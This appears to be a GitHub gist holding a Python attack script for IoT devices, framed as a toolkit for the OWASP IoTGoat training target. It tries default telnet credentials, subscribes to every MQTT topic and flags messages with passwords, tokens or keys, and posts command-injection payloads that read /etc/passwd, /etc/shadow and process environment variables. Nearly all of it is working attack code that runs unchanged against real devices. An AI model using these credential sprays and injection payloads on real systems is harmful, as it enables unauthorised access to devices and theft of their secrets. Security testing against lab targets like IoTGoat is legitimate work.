Skip to content

Instantly share code, notes, and snippets.

@williamzujkowski
Created November 3, 2025 22:49
Show Gist options
  • Select an option

  • Save williamzujkowski/8d96ac97bbb24da06b9b381c4b46b441 to your computer and use it in GitHub Desktop.

Select an option

Save williamzujkowski/8d96ac97bbb24da06b9b381c4b46b441 to your computer and use it in GitHub Desktop.
IoT Vulnerability Testing Toolkit - Default credentials, MQTT discovery, command injection tests for OWASP IoTGoat
#!/usr/bin/env python3
"""
IoT Vulnerability Testing Toolkit
Combines default credential testing, MQTT discovery, and command injection tests
for OWASP IoTGoat security assessment
"""
import telnetlib
import time
import paho.mqtt.client as mqtt
import requests
# Common default credentials in IoT devices
credentials = [
('admin', 'admin'),
('root', 'root'),
('admin', '1234'),
('user', 'user'),
('admin', 'password')
]
def test_telnet_auth(host, port=23):
"""Test for default credentials on telnet service"""
for username, password in credentials:
try:
tn = telnetlib.Telnet(host, port, timeout=5)
tn.read_until(b"login: ")
tn.write(username.encode() + b"\n")
tn.read_until(b"Password: ")
tn.write(password.encode() + b"\n")
result = tn.read_some()
if b"#" in result or b"$" in result:
print(f"[+] Found credentials: {username}:{password}")
return True
except:
continue
return False
class MQTTExplorer:
def __init__(self, broker_addr):
self.broker = broker_addr
self.client = mqtt.Client()
self.discovered_topics = set()
def on_connect(self, client, userdata, flags, rc):
if rc == 0:
print("[+] Connected to MQTT broker")
# Subscribe to all topics
client.subscribe("#", 0)
client.subscribe("$SYS/#", 0)
def on_message(self, client, userdata, msg):
self.discovered_topics.add(msg.topic)
print(f"[*] Topic: {msg.topic}")
print(f" Payload: {msg.payload.decode('utf-8', 'ignore')}")
# Check for sensitive data patterns
payload = msg.payload.decode('utf-8', 'ignore')
if any(keyword in payload.lower() for keyword in
['password', 'token', 'key', 'secret']):
print("[!] Potential sensitive data found!")
def test_command_injection(url, param_name):
"""Test for command injection vulnerabilities"""
payloads = [
"; cat /etc/passwd",
"| cat /etc/shadow",
"$(cat /proc/self/environ)",
"`id`"
]
for payload in payloads:
data = {param_name: f"test{payload}"}
response = requests.post(url, data=data)
if "root:" in response.text or "uid=" in response.text:
print(f"[!] Command injection found with: {payload}")
return True
return False
if __name__ == "__main__":
# Example usage
print("IoT Vulnerability Testing Toolkit")
print("=" * 50)
# Test telnet authentication
# test_telnet_auth("iotgoat.local")
# Test MQTT discovery
# explorer = MQTTExplorer("iotgoat.local")
# explorer.client.on_connect = explorer.on_connect
# explorer.client.on_message = explorer.on_message
# explorer.client.connect(explorer.broker, 1883, 60)
# explorer.client.loop_forever()
# Test command injection
# test_command_injection("http://iotgoat.local/api/device", "device_name")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment